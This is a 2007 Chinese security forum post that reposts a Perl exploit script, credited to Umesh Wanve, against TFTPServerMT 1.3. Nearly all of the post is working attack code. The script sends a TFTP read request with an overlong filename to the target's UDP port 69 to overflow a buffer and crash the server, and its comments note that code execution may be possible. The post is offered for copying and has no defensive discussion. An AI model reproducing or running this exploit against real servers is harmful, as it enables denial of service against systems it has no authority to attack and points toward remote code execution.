‹‹ 上一主题 | 下一主题 ››
发新话题
打印

TFTP Server 1.3 Remote Buffer Overflow Denial of Service Exploit

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1107 小时 
注册时间
2007-10-23 
最后登录
2008-8-29 

资料收集奖 运营支持奖

楼主 发表于 2007-3-17 23:27  只看该作者

TFTP Server 1.3 Remote Buffer Overflow Denial of Service Exploit

复制内容到剪贴板
代码:
#################################################################################################################
#  Name : TFTPServerMT v 1.3 Remote Buffer Overflow Dos Exploit
#
#  Author: Umesh Wanve
#
#   Date: 01-03-2007
#
#  Desc: This is latest version of TFTP server. EDI gets overwritten at 246. So code execution may be possible
#     Someone can better write it. Sending a long file name on the vulnerable server can crash the server.
#
#  Details: [url]http://sourceforge.net/project/showfiles.php?group_id=162512[/url]
#
###############################################################################################################
#!/usr/bin/perl

use IO::Socket;
#use strict;


my($read_request)="\x00\x01";                        # GET or PUT request

my($tailer)="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";           #transporting mode (eg. netascii)  

my($pad)="\x90" x 279;               



if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "69",

Proto  => "UDP"))
{
        

         print $socket "\x00\x01".("A"x242)."BBBB".$tailer;

         sleep(1);
      
        
         close($socket);
}
else
{
         print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题